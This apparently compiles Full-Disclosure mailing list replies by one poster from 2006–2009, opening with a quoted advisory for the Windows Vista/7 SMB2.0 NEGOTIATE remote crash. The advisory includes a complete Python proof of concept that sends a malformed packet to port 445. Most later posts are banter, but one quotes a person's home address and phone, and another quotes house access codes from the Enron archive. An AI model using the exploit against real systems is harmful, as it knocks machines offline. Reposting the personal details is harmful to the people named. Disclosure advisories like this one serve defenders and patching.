>> > "\x30\x30\x32\x00"
>> > )
>> > s = socket()
>> > s.connect(host)
>> > s.send(buff)
>> > s.close()
>> >
>> > V. BUSINESS IMPACT
>> > -
>> > An attacker can remotly crash any Vista/Windows 7 machine with SMB
>> enable.
>> > Windows Xp, 2k, are NOT affected as they dont have this driver.
>> >
>> > VI. SYSTEMS AFFECTED
>> > -
>> > [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server
>> 2008
>> > < R2, Windows 7 RC.
>> >
>> > VII. SOLUTION
>> > -
>> > No patch available for the moment.
>> > Close SMB feature and ports, until a patch is provided.
>> > Configure your firewall properly
>> > You can also follow the MS Workaround:
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> > VIII. REFERENCES
>> > -
>> > http://www.microsoft.com/technet/security/advisory/975497.mspx
>> >
>> http://blogs.technet.

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

[Randal T. Rioux]

After testing my version of the exploit (using Java instead of Python) I 
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy


laurent gaffie wrote:
> Advisory updated :
> 
> 
> =
> - Release date: September 7th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: High
> =
> 
> I. VULNERABILITY
> -
> Windows Vista, Server 2008 < R2, 7 RC :
> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
> 
> II. BACKGROUND
> -
> Windows vista and newer Windows comes with a new SMB version named SMB2.
> See: 
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> for more details.
> 
> III. DESCRIPTION
> -
> [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS 
> patch, for another SMB2.0 security issue:
> KB942624 (MS07-063)
> Installing only this specific update on Vista SP0 create the following 
> issue:
> 
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE 
> PROTOCOL REQUEST functionnality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a 
> SMB server, and it's used to identify the SMB dialect that will be used 
> for futher communication.
> 
> IV. PROOF OF CONCEPT
> -
> 
> Smb-Bsod.py:
> 
> #!/usr/bin/python
> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
> 
> from socket import socket
> 
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negociate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
> 
> V. BUSINESS IMPACT
> -
> An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
> Windows Xp, 2k, are NOT affected as they dont have this driver.
> 
> VI. SYSTEMS AFFECTED
> -
> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 
> < R2, Windows 7 RC.
> 
> VII. SOLUTION
> -
> No patch available for the moment.
> Close SMB feature and ports, until a patch is provided.
> Configure your firewall properly
> You can also follow the MS Workaround:
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> 
> VIII. REFERENCES
> -
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
> 
> IX. CREDITS
> -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com 
> 
> X. REVISION HISTORY
> -
> September 7th, 2009: Initial release
> September 11th, 2009: Revision 1.0 release
> 
> XI. LEGAL NOTICES
> -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
> 
> XII.Personal Notes
> -
> Many persons have suggested to update this advisory for RCE and not BSOD:
> It wont be done, if they find a way to execute code, they will publish 
> them advisory.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Slashdot hacked?

[Randal T. Rioux]

On Thu, July 23, 2009 5:47 pm, Compsec Guy wrote:
>
> What's wrong with Slashdot today?

Nothing.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Black Hat USA Videos available to D/L

[Randal T. Rioux]

On Mon, March 30, 2009 8:14 pm, jmoss wrote:

> Hey Full Disclosure,
>
> I am proud to announce that the audio and video from BH USA 2008 is now
> available for free download, and is in several formats, the first of which
> is a large, hi-res format with video-sync speaker and presentation:
> https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html


.m4v? Really? Oh Jeff. Nobody uses Macs. We like software freedom. Come
back to the DC-stuff mailing list so we can discuss this :-)

Off to start converting videos...

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

[Randal T. Rioux]

On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote:

> OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is
> interpreting this, this way? Really? When has releasing a solution to a
> problem 7 years later ever been acceptable?

May not be acceptable, but it is standard practice with some "software"
companies.

They're not closed-source because they care about security. They're
closed-source because they're lazy (and/or don't care about anything but
quick money).

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v not a troll

[Randal T. Rioux]

On Mon, September 15, 2008 1:08 pm, n3td3v wrote:
> On Mon, Sep 15, 2008 at 5:49 PM,  <[EMAIL PROTECTED]> wrote:
>> On Mon, 15 Sep 2008 08:09:12 BST, n3td3v said:
>>> n3td3v is outspoken but hes not a troll. he is a serious security
>>> researcher with his own mailing list.
>>
>> ...
>>
>>> and then someone hurtfully says im a troll, what does this mean?
>>
>> It means that if you don't understand what a troll is,
>
> It means posting inflammatory comments on purpose to get a response, yet
> i've never done this ever, So I can't be a troll, because I've never
> purposely set out to post something just to get a reaction. Anything I
> say is my actual opinion, so accept it or unsubscribe.

It is "Full-Disclosure," not "Opinion-Disclosure."

Sure, you can do it. Just expect the appropriate responses.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v domain

[Randal T. Rioux]

On Fri, September 12, 2008 2:58 pm, n3td3v wrote:
> On Fri, Sep 12, 2008 at 7:48 PM, n3td3v <[EMAIL PROTECTED]> wrote:
>> On Fri, Sep 12, 2008 at 2:11 PM, root <[EMAIL PROTECTED]> wrote:
>>> All,
>>>
>>> If anyone is interested, n3td3v.com is up at auction with its first
>>> bid.
>>>
>>> Here's a direct link to the listing:
>>>
>>> https://sedo.com/auction/auction_detail.php?tracked=&partnerid=&langu
>>> age=us&auction_id=41146
>>> >> uage=us&auction_id=41146>
>>>
>>
>> I'll sue you and get the 80 USD!!!
>>
>> All the best,
>>
>> n3td3v
>>
>
> I'm worried someone is going to buy this domain and put malware on it or
> use it for some other evil deed, and then I get the blame for it. :(
>
> I just hope the authorities know this domain isn't affiliated with the
> real n3td3v.
>
> These are malicious blackhats who are selling this domain, please disgard
> the 'n3td3v' reference, as its nothing to do with n3td3v.
>
> n3td3v is a whitehat and does not endorse this sale for any purpose.

You don't get to wear a hat. We the "community" bestow on you a onesie. Pink.

FYI, these are available for normal registration fees:

n3td3v
.mobi
.org
.us
.tv
.cc
.bz
.biz
.name
.pro
.co.uk
.eu
.de

I smell a botnet cooking.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] security news on cnet???

[Randal T. Rioux]

On Tue, Sep 2, 2008 at 11:07 AM, n3td3v <[EMAIL PROTECTED]> wrote:
>
> you've not post any security news all week, what's going on cnet??? is
> the journalist that does the security news off ill???
>
> :(
>
> yours,
>
> cnet fan

surely they will cave to pressure from the global powers of the netdev
group. i bet they'll be a story up for comment pretty soon now.

randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] DIE IN A FIRE post

[Randal T. Rioux]

On Wed, August 27, 2008 11:34 am, Simon Smith wrote:
> Hi Mike,
>   Next time you decide to say something stupid make sure that you do it
> anonymously.
>
> Michael C Shirk
>
> Home:
> 4205 Chapel Gate Pl
> Belcamp, MD 21017-1636
> (410) 273-1377
>
> M. Shirk wrote:
>> DIE IN A FIRE !!!1!1!
>>
>> Shirkdog
>> ' or 1=1--
>> http://www.shirkdog.us

Simon:

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?
A: Top-posting.
Q: What is the most annoying thing in e-mail?

Shirkdog:

Seems we share a state. Ask the evil hacker Simon for my address - come on
over. I'll back a cake.

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] simple phishing fix

[Randal T. Rioux]

On Tue, July 29, 2008 2:31 pm, [EMAIL PROTECTED] wrote:
> You might eliminate phishing but there are occasionally messages from
> people at these institutions also. This sort of thing is in essence
> allowing phishers a denial of service attack against anyone they choose
> to make themselves a nuisance with.
>
> I am not well pleased with any bank authentication I have seen so far
> personally; seems to me finance-related messages should be authenticated
> both ways and preferably a confirming authentication to demonstrate the
> subject agrees with the transaction should be done before such are
> accepted. That kind of thing would be hard to spoof and if done right
> pretty useless to someone who could record entire transactions.
>
> As for email, judge by its content. This posting for example will do
> nothing to your money, sells you nothing. Nor does it ask any information
> of you. If it were spoofed it would be harmless.
>
> Glenn Everhart
>

But it is from Chase and nothing good comes from Chase ;-)


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution

[Randal T. Rioux]

On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
> Please allow at least one week for us to respond before public
> disclousure. We only received this information a few days ago.
>
> Regards,
>
> -- Pedro Bustamante Senior
> Research Advisor Panda Security

It takes a week to hit the "respond" button? At least be polite and read
your mail, perhaps with a quick "stand by, we're looking into it" response
so folks think you care.

We are an impatient lot in this community.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to det ect credit cards

[Randal T. Rioux]

On Fri, May 9, 2008 4:23 am, West, Bill (USA) wrote:
> I am no longer on-site full time and have limited access to e-mail. I will
> respond to you as soon as I can. If your issue is an emergency, please use
> the contacts below.
>
> Emergencies for MTU Users: Contact Augustin Schuster, +1-860-667-6620
> Emergencies for T-Systems & MTU Management: Contact Mike Bouranis,
> +1-248-276-3459
>
> Thanks
>

Folks, it is 2008. Like cell phones, e-mail autoresponders are no longer
cool. Use a separate address for mailing lists (like a personal or
disposable one) so we don't get bombarded with your junk.

Did I mention the social engineering treasures sent around the world with
each one? Do you really work in security?

Gah!

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Snort Signature to detect credit cards

[Randal T. Rioux]

FYI - http://www.emergingthreats.net

This was discussed on the snort-sigs mailing list back in 2003. Check out
http://marc.info/?l=snort-sigs&m=106601612825950&w=2

Also, as Ray mentioned, the Emerging Threats emerging-policy.rules
contains some PCRE CC# checks. This will show you some:

$ more emerging-policy.rules | grep Number


Randy


On Thu, May 8, 2008 11:02 pm, Simon Smith wrote:
> You sure you got that URL right?
>
> Ray P wrote:
>> The free rule sets from http://www.emergingthreats.com have this
>> capability. Look in the Policy section.
>>
>> RAy
>>
>> 
>> From: [EMAIL PROTECTED]
>> To: full-disclosure@lists.grok.org.uk
>> Date: Thu, 8 May 2008 12:44:15 -0600
>> Subject: [Full-disclosure] Snort Signature to detect credit cards
>>
>>
>> Does anyone have a snort signature to detect credit cards or social
>> security numbers?
>>
>> Thank you in advance,
>>
>> Jeff
>>
>>
>> 
>> Get Free (PRODUCT) RED™ Emoticons, Winks and Display Pics. Check it out!
>> 
>>
>>
>> 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> --
>
> - simon
>
> --
> http://www.snosoft.com
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] netdev threadjack and spam and al-qaeda mi5 underground contacts & secrets

[Randal T. Rioux]

On Fri, April 11, 2008 4:41 pm, n3td3v wrote:

> I'm an unemployed working class dude, i'm not part of the industry.

Can one be "unemployed" and "working class" at the same time?

If one works in security in a capacity to earn an income, would that not
automatically place them in "the industry"?



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] hacking a pacemaker

[Randal T. Rioux]

On Wed, March 12, 2008 4:57 am, Gadi Evron wrote:
> Almost a year ago I gave a talk at the CCC Camp in Germany I called
> "hacking
> the bionic man". It even made Wired, in some fashion.
> http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html
> http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html
>
> In the talk, among other things such as the DNA and scripting languages,
> medical doctors and reverse engineers...  was about cybernetic hacking.
> I gave some predictions, some for 2 years, others 40 years. Some again
> were
> pure science fiction. I was wrong on the 2 years, it's here.
>
> Today, this came up in the news (hat tip to Paul Ferguson on the funsec
> mailing
> list):
> http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1&oref=slogin
>
> " The threat seems largely theoretical. But a team of computer security
> researchers plans to report Wednesday that it had been able to gain
> wireless
> access to a combination heart defibrillator and pacemaker.
>
> They were able to reprogram it to shut down and to deliver jolts of
> electricity
> that would potentially be fatal . if the device had been in a person. In
> this
> case, the researcher were hacking into a device in a laboratory. "
>

When I got my pacemaker I was working on some RF programming project.

My doctor told me to find another job, he could sense my curiosity.

Who could resist such fun?!

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Dude VanWinkle's Death

[Randal T. Rioux]

I always think of these pics when those precious snowflakes post nonsense:

http://i118.photobucket.com/albums/o100/EMPulse_of_KC/itg_quarterly.jpg

http://www.stevelambe.com/posts/Nerd.jpg

http://www.encyclopediadramatica.com/images/8/88/Itg.jpg

Attention whores, the lot of them.

Par for the course...


On Mon, February 11, 2008 2:51 pm, Geoffrey Gowey wrote:
> I can't even believe some of the people on this list would take this
> posting as a joke.  This could have been any of us.  Disagreeing about a
> persons opinion and discussing is part of being on this list, but it's
> something else entirely when, solely based on what they voiced on a
> professional mailing list about professional topics, some of the members
> are rejoicing. Now that is just purely tasteless and cold hearted.
>
> I guess the fact that these people who are rejoicing are the same group
> that hide behind anonymous mail just goes to show that keyboard bravery
> really can separate a person from their humanity.  For those of you
> keyboard warriors who may disagree with some of the people here and voice
> your disagreement in a manner befitting a toddler I normally chalk up
> your nonsense to immaturity, but celebrating the death of someone who
> maintained his professionalism is inhuman.  It has been par for the
> course for years to have a heavy helping of nonsense come from those who
> would hide their identity not for professional reasons, but for them to
> act out what Freud defined as their Id.  This topic, however, shows these
> same bunch of people for what they truly are: self-serving immature
> cowards.
>
> I never knew really knew this person while he was alive and I am not
> trying to paint a picture of him as a saint, but for the immature lot on
> this list now would be a good time to know when to refrain from your
> impulse of banging out some immature posting.  Show some small measure of
> humanity and let those affected who knew this person grieve without your
> antics.
>
> On Feb 11, 2008 7:40 AM, Jonathan Glass <[EMAIL PROTECTED]> wrote:
>
>
>> http://www.timesreporter.com/index.php?ID=79446&r=6&Category=7
>>
>> Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in his home
>> on Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976.
>>
>> At the time of his death, Justin was employed at the Georgia Institute
>> of Technology's Office of Information Technology in the Division of
>> Architecture and Infrastructure.
>>
>> Justin is survived by his parents, mother Carol Anson Stanwyck (Doug),
>> and father Free Polazzo (Janet), brother Chad Polazzo (Lori), and
>> stepsister Liz Stanwyck. Other area surviving relatives are Betty
>> Anson, Wendy (Wagner) Muzechuk, Ashley and Maggie Haverfield and James
>> Anson (Marilyn) from Illinois.
>>
>> A memorial service will be held Sunday, Feb. 10, 2008, in Atlanta.
>>
>> It's been a sad week for the friends of Dude VanWinkle.
>>
>> --JG

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [FDSA] Notepad Highly CriticalCross-SiteScripting (XSS) Vulnerability

[Randal T. Rioux]

> Fredrick Diggle Security Advisory
>
>Application: Notepad
>Versions: 5.1.2600.2180 verified to be vulnerable
>Platforms: Microsoft Windows (All Versions)
>Bugs: Cross Site Scripting (XSS)
>Severity: Critically High
>Date: 17 Jan 2008
>Credit: Estr Hinan
>
>###

>That’s a really funny “security risk”. I don’t agree with you, because
>otherwise every editor, which is able to save HTML Files, is a security
>problem. So vi, Dreamweaver, emacs… are all unsecure? It is your decision,
>to open a HTML file or not. And (if here are some MS guys) please don’t fix
>this “issue”, because sometimes, if you haven’t a professional tool at the
>moment, the Windows editor can be useful, too.  Also, if you need to edit
>some small Scripts.
>
>Yours, 
>SR
>

Speaking of professional tools...

Let's hope this was just a language translation error and not a fully 
understood response.

Lighten up, folks.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Was secreview crap - now OpenVMS!!

[Randal T. Rioux]

>[EMAIL PROTECTED] said:

>Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>No C knowledge needed for those critters...

OpenVMS is less than 40% Blissful... though I'm not familiar with the original 
source (wasn't it written on stone tablets?). About 50% is C, with a healthy 
mix of obsoletes making the difference. How something so elegant could be 
spawned from such chaos is beyond me.

Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 

I really wish HP would open OpenVMS before they kill it.

Security relevance: UNHACKABLE! 

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Professional IT Security Providers - Exposed]QuietMove ( D - )

[Randal T. Rioux]

> 
> QuiteMove
> http://www.quitemove.com
> QuietMove
> 

A tad more attention to details would be nice.

Good thing you're not graded on spelling here. C-.


Happy New Year,
Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

full-disclosure@lists.grok.org.uk

[Randal T. Rioux]

minor float wrote:
> hi
> 
> has anybody security contact in at&t?

http://www.nsa.gov/contacts/index.cfm

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Am I missing anything ?

[Randal T. Rioux]

http://uncyclopedia.org/wiki/Pot_v._Kettle



Kradorex Xeron wrote:
> Simon and Joey,
> 
> Your comments are not contributing anything of value to the list and is 
> causing SNR of the list to go down.
> 
> I strongly suggest for you to both take your personal banter off-list. I 
> suspect that the rest of the list does not want to hear your personal banter 
> toward each other.
> 
> This is a security list, not a space for your personal bickering. Grow up.
> 
> On Monday 23 July 2007 18:48, Simon Smith wrote:
>> Right kid... Can we also agree that you are immature? I mean, we can't lay
>> this to rest unless we come to a compromise. Frankly, I don't feel that it
>> would be a compromise if you didn't come half way in this relationship.
>>
>> While we're at it... Lets also agree that you're a coward, probably fat and
>> lethargic... With no real friends... Who never really gets laid?
>>
>> Yeah I think that about sums it up... ;]
>>
>> On 7/23/07 6:40 PM, "Joey Mengele" <[EMAIL PROTECTED]> wrote:
>>> No, I forgot. I now remember, thank you. As long as we agree that
>>> you were wrong, I was right, and you are an ignorant jackass who
>>> may or may not have had sexual relations with the Oreo named KF, I
>>> see no need for this thread to continue.
>>>
>>> J
>>>
>>> On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith <[EMAIL PROTECTED]>
>>>
>>> wrote:
 You are right with respect to your RFI comment... But as far as me
 learning
 anything, don't count on it. I am after all an ignorant jackass
 remember?



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Macro threats

[Randal T. Rioux]

Muscarella, Sebastian (IT) wrote:

> 
> 
> NOTICE: If received in error, please destroy and notify sender. Sender
> does not intend to waive confidentiality or privilege. Use of this email
> is prohibited when received in error.
> 
> 
> 
> 

1. Shouldn't I destroy the sender *after* notifying him?

2. You may not intend to waive confidentiality or privilege, but you did.

3. You can't prohibit what I do with this email. It is mine now. Moohahaha!

Seriously. These tags piss me off. There is no legal justification. It
just makes the company's admins look like uneducated asses. I encourage
all organizations to accept the fact that your emails are community
property once you hit send. There is no e-mail Postal police nor should
there be. Encrypt everything.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The Cyber war on Iran

[Randal T. Rioux]

Paul Schmehl wrote:
SNIP
> You seem to be living under the delusion that your actions can somehow
> influence the extremists.  There's only two actions that will influence
> the extremists in any way and that is to kill or imprison them. 
> Anything else you might try, like trying to make nice with them or
> negotiate with them, is a complete waste of time and merely hastens your
> own death or imprisonment.
> 

I can't believe you made a public statement about killing or imprisoning
Mr. Bush. Of course, along with a few dozen of his hench(wo)men as well.

Be careful, they'll send you to another country to torture you. Or is
that even necessary now since he's wiped his ass with our Constitution?

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Simcard 0day.

[Randal T. Rioux]

Blue Boar wrote:
> dfklsddshd wrote:
>> 1. Open attachment.
> 
> Does this actually work on people on a security mailing list?
> 
>   BB
> 
> Complete scanning result of "Simcard.com", received in VirusTotal at
> 01.02.2007, 02:38:58 (CET).
>  

you would be quite surprised, i'm sure.

randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation

[Randal T. Rioux]

Josh Bressers wrote:
>> eEye Research - http://research.eeye.com
>>
>> Intel Network Adapter Driver Local Privilege Escalation
>>
>> Release Date:
>> December 7, 2006
>>
>> Date Reported:
>> July 10, 2006
>>
>> Severity:
>> Medium (Local Privilege Escalation to Kernel)
>>
>> Systems Affected:
>> Windows 2000, XP, 2003, Vista
>> Intel PRO 10/100   - 8.0.27.0 or previous
>> Intel PRO/1000 - 8.7.1.0  or previous
>> Intel PRO/1000 PCI - 9.1.30.0 or previous
>> Linux
>> Intel PRO 10/100   - 3.5.14  or previous
>> Intel PRO/1000 - 7.2.7   or previous
>> Intel PRO/10GbE- 1.0.109 or previous
>> UnixWare/SCO6
>> Intel PRO 10/100   - 4.0.3  or previous
>> Intel PRO/1000 - 9.0.15 or previous
> 
> It's worth noting that this advisory is misleading.  This flaw does not
> affect the Linux drivers.  The Linux drivers do not support the NDIS API
> and the OID concept that Windows does.
> 

Thanks for the confirmation... I thought I had gone mad for a bit there.
It just didn't sound right. The version numbers threw me off. Does
anyone know how these specific Linux driver version numbers were determined?

Randy


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Enron Mail archive..... oops

[Randal T. Rioux]

Thierry Zoller wrote:
> Dear List ,
> 
> Search the Enron mail archives, for example "Password" :
> 
> http://enron.trampolinesystems.com/search/FBI#focus=/search/password
> 

I hope this code was changed:

*

Aspen Security Codes
Email details

From:
Sally Keepers
To:
[EMAIL PROTECTED] , [EMAIL PROTECTED] ,
[EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] ,
[EMAIL PROTECTED] , Kenneth Lay (hide last 2)
Sent:
19/09/2000 at 11:26

Email metadata

Themes:

The message

Per Margie, the access code for the #2 house is 2001, for the #3 house it is
20011.

*

So many interesting emails to waste valuable time reading :-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [OT for crybaby list-nazis] blah blah now D.O.A.P.

[Randal T. Rioux]

William Lefkovics wrote:
> Tangental to this discussion is the no doubt (to be) controversial UK film
> D.O.A.P. soon to be screening in Toronto.
> 
> http://www.e.bell.ca/filmfest/2006/media_centre/news_releaseItem.asp?id=261
> 
> It's a docu-drama of the possible ramifications following the ficticious
> assassination of George Bush in Chicago in 2007.
> 
> Is it the London Bridge you have for sale?
>

I'm guessing it ends with the world exploding. Because the only thing
worse than the asshat we now have at the wheel here (USA) would be
Cheney steering us into an iceberg. (Trivia! Cheney and I have the same
cardiologist... WTF)

Politics aside, I like movies that stir the pot. It could be interesting.

As for the bridge... sure, L.B. works. We may have a buyer from Dallas ;-)

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: George Bush appoints a 9 year old to... blah blah blah

[Randal T. Rioux]

Paul Schmehl wrote:
> --On Tuesday, August 29, 2006 17:34:24 -0400 [EMAIL PROTECTED] wrote:
> 
>> On Tue, 29 Aug 2006 14:55:09 CDT, Paul Schmehl said:
>>> > 1] Hezbollah has managed to become an important presence in the
>>> > Lebanese Parliament
>>>
>>> They just left out - by killing opposition leaders and threatening
>>> others.
>>
>> Like your government doesn't do that too?
>>
> Uhright.

Wow.

I have a bridge for sale... interested?

Is there a library at your school? Stop by sometime.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IBM to buy ISS

[Randal T. Rioux]

Mike Owen wrote:
> Sounds like IBM is going to buy out ISS. Having too much experience in
> dealing with IBM contractors and support, I don't think this is a good
> thing for ISS or their customers.
> 
> http://www.iss.net/about/press_center/releases/us_ibm_08233006.html

You would think IBM would try and add a security company to their ranks.
It is definitely something they should consider, rather than expanding
their waistline with bloatware.

Randy

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Tempest today

[Randal T. Rioux]

[EMAIL PROTECTED] wrote:
> On Sat, 19 Aug 2006 18:49:09 -0500 Bipin Gautam
> <[EMAIL PROTECTED]> wrote:
>> Ok, here is something from the book that I was trying to
>> assemble/write.
> 
>> Some Links: http://www.eskimo.com/~joelm/tempest.html
>> http://www.erikyyy.de/tempest/
> 
>> Lets begin&
>>
>> SNIP SNIP SNIP
> 
> Please help make the list self-policing.  Follow the list charter
> and note that self-promotion is forbidden.

Please don't quote the entire message in your response if you have
nothing useful to add.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Will the spammer please stop!

[Randal T. Rioux]

Dan B wrote:
> Hi,
> 
> Karol Wiesek wrote:
>> Just add rule to Your procmail or any other stuff and ignore it.
>>
>>   
> ,,,snip...snip...
> The best solution I see is sender verification, which I currently use on
> Postfix and this is the same MTA that is used for the list. It is a
> minor configuration change. Indeed it causes more traffic(verification
> of domain initially, and then a brief attempt to connect and send a mail
> to the sender), but that is nowhere near as much as this spam is generating.
> 

The words "best solution" should NEVER be used in the same sentence as
